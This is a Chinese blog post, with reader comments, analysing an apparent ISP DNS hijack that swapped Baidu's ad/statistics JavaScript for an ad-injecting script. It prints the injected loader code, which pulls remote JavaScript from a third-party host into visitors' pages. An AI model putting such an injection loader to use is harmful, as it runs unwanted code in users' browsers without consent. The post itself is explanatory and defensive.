DNS 糟污染,百度统计的 js 链接被劫持

LMS
2.6K+ 51

最近在家里打开自己的博客经常网页底部弹出弹窗广告,虽然博客放了百度的广告,但我并没有设置底部弹窗,一度以为网站被人黑了,分析了下页面代码才发现,原来是百度统计的 js 链接被劫持,导致网站跳出广告。

百度统计里有一段是通过以下 js 链接引用百度官方的代码,原本打开后是一大堆乱七八糟的 js,被劫持后就变成几行全新的代码。

百度统计被劫持的 js 链接地址:http://cpro.baidustatic.com/cpro/ui/i.js
被劫持后上面 js 链接打开后的代码内容:

var jumpJs='http://cpro.baidustatic.com/cpro/ui/i.js';
var _ruleType='nn_p';
var comjs='http://yunyunyun.b0.upaiyun.com/js/scriptcc_v1.min.js';
if (typeof _flag == 'undefined'){var _flag = true;}else{comjs=jumpJs+'?checkSign=201509';}
var script=document.createElement("script");
script.src=comjs;
script.type='text/javascript';
document.head.appendChild(script);

有趣的是,这个代码里面第 3 行的那个外链 js 居然是引用又拍云的,而这个地址不知道什么原因经常会打不开(能打开时是一大堆乱七八糟的 JS 代码),导致审查元素的时候会提示 net::ERR_CONNECTION_TIMED_OUT 错误,但不影响百度链接被劫持后强行弹窗的广告。

劫持后弹出的广告代码会伪造一个 cnzz 统计的样子,然后通过 iframe 打开一个 i.dreamfull.cn 的页面,ping dreamfull.cn 和 i.dreamfull.cn 返回的值不一样,根域名返回的是 101.200.29.89 的 ip 地址,但请求超时,2 级域名返回的地址是 i.dreamfull.cn.w.kunlunpi.com [61.154.126.30],能 ping 的通,貌似还是阿里云的服务器。Whois 查了下这两个域名,都是阿里巴巴(万网)注册的,且设置了隐私保护。

fuckad1

搜索了一下,发现不止我一个人遇到这种情况,也知道了这种情况原来是 DNS 被运营商污染导致的,而且大多发生在小城镇或者城郊地区(城区估计是怕被投诉,小地方弹出广告估计用网络的也不知道怎么回事),不分电信还是移动还是其他运营商(我用的是电信),怎一个黑心了得。

百度贴吧里有个帖子,不知道是什么年代的,说是把地址改成 https 能解决问题,经过实测没有任何鸟用,所以,估计要解决问题估计只有等运营商良心发现了。

THE END

评论 51

  1. 厉害了,我的哥。老哥不打算上Let's Encrypt的车吗?

      1. 大炮是一种国家级的网络攻击形式,不过只要运营商级就可以做得到,1可以劫持流量,2可以定向攻击。

          1. 不是你变成肉鸡,而是访问你网站的用户会变成肉鸡,这个其实和你关系不大,只要你引用了百度的脚本,那就是会这样。
            上ssl并不一定有效,因为你最后还是要引用非ssl的百度代码。而且没法确定百度不是参与者之一。

  2. 百度的产品,你们居然还在用,还敢用!它的产品就没有可替代的吗?答案是否定的!

    1. 主要是挂了百度广告,顺便用百度统计,这样登录百度联盟就能看到统计信息比较方便。

  3. 我们公司网站前阵子也出现广告,改https有效啊

    1. 审查元素看我的百度代码 有加https,无效。
      据说了要本站https才有效。

      1. 你这是开启了其他服务吧,百度统计是那个hm开头的域名

  4. 我目前在和运营商沟通,垃圾电信依旧不改DNS劫持本色。

    1. 他会承认么?难道不是直接投诉?

  5. 博主你好,我们现在也遇到这个问题。
    百度官方的解决办法无效。
    我们现在也不得不暂时放弃百度统计,
    请教博主,除了放弃百度统计和上https,可还有其他解决办法?

    1. 还有一种方法就是去投诉你的电信服务商,如果是电信就投诉电信,如果是移动就投诉移动,如果是联通就投诉联通,具体到哪里去投诉我也不大清楚。

  6. 原来是这个原因,还以为百度这么恶心,在免费的统计上放广告。。。误会百度了。不过现在换用CNZZ也挺好的

  7. 百度黑心也不是第一天了,只是越发疯狂了,“上帝要让其灭亡必先让其疯狂” 嘻嘻

    1. 上腾讯的,免费一年,我试过了,申请很快。

      1. 我在阿里云的免费虚拟主机,打算2月份过去继续买一个虚拟主机待着吧又不用管!

        1. 你不是说ssl么,我说的是腾讯的免费ssl啊。

  8. 我都不用这些统计工具的。话说也就自己网站,换其他不常用网站弹个广告可能没注意也就过去了。

    1. 那肯定了,不是自己的站广告那么多谁还管它是谁的广告啊。
      统计代码有的时候看看都哪里来的也挺有趣。

  9. Always.Life
    🏆🏆🏅

    一开始以为是很强的技术贴,看完后,原来是吐槽……

  10. 我去,亏的打算把新网站的超文本协议改成https

    1. 据说是有用的,我这里之所以没用是因为我的网站不是https。

  11. 咱这段位的还用什么百度统计啊。
    如果需要统计的话用piwik吧。

    1. 全家桶啊,百度广告 百度统计,嘿嘿嘿。
      你玩的那个貌似要自己搭也挺麻烦。

  12. 这个还真没遇到过,不过确实挺可气的,不过都是为了钱……

  13. =,=我一直用的CNZZ。。。话说,你的这个代码高亮,有点问题,有点乱掉了。。。是不是用的UEDITOR?

    1. 不是,我这个代码高亮是js的,js被我放末尾了,所以要js加载完了它才会显示正常。
      以前也用过cnzz 不做后来不知道为啥放弃了,cnzz一样也会被劫持。

      1. 被劫持的具体体现是?!=,=|||

  14. 只要你网站是https,引用的js也是https,应该没问题才对啊。任何一环不是https才可能被劫持。

  15. 岂止三线小地方,中大型城市也比比皆是。主要还是没人管。

    1. 大的地方投诉应该会有效,可以试试,小地方天高皇帝远,根本不鸟。

  16. HTTPS 都能劫持,好厉害。。。

  17. 要不把百度广告给撤掉???

  18. 够恶心的,投诉运营商

    1. 小地方,投诉人家估计都不鸟你。

      1. 好像可以到工信部网站投诉,据说效果很好。

发表评论

Submit